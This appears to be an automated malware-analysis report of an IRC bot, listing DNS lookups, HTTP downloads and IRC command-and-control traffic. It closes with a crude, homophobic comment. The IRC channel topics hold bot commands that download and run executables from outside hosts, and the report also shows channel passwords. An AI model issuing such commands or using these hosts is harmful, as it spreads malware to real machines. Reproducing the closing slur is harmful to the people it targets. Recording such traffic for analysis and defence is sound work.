– DNS Queries:
net.anddos.co.uk DNS_TYPE_A 94.75.216.31 1
wpad DNS_TYPE_A 0
www.sevgideyim.com DNS_TYPE_A 91.194.90.92 1
– HTTP Conversations:
91.194.90.92:80 – [www.sevgideyim.com]
Request: GET /resimlerim.exe
Response: 200 “OK”
– IRC Conversations:
94.75.216.31:6667
Nick: [nLh-VNC]ewuowy
Username: qtykph
Joined Channel: #dbot with Password pass
Channel Topic for Channel #dbot: “.h download http://www.sevgideyim.com/resimlerim.exe c:sdffd.exe 1 “
Private Message to Channel #dbot: “RAGE: file running: 128 KB.”
Private Message to Channel #dbot: “Samuray ^C13Ananxfd sikkkkeeeeRimmmmmm Gxf6txfcnden”
Outgoing Connections
HTTP Data
Method: GET
Url: 94.75.216.31/~anddos/rap/lsass3.exe
HTTP Version: HTTP/1.1
Header Data
User-Agent: Mozilla
Host: 94.75.216.31:85
IRC Data
User Name: utlncz
Host Name: “”
Server Name:
Real Name: utlncz
Password: dickybob
Nick Name: aiatqo
Non RFC Conform: 1
Channel
Name: #ohai
Password: 0day
Topic Deleted: :.dl http://94.75.216.31:85/~anddos/rap/lsass3.exe c:lsass3.exe 1
Notice Message Deleted
Value: :irc.goonet.net NOTICE AUTH :*** Looking up your hostname…
Value: :irc.goonet.net NOTICE AUTH :*** Couldn’t resolve your hostname; using your IP address instead
anddos i was surprised when i saw u are turkish hahah now that other turkish gay d0lar is goint to talk shit with you lol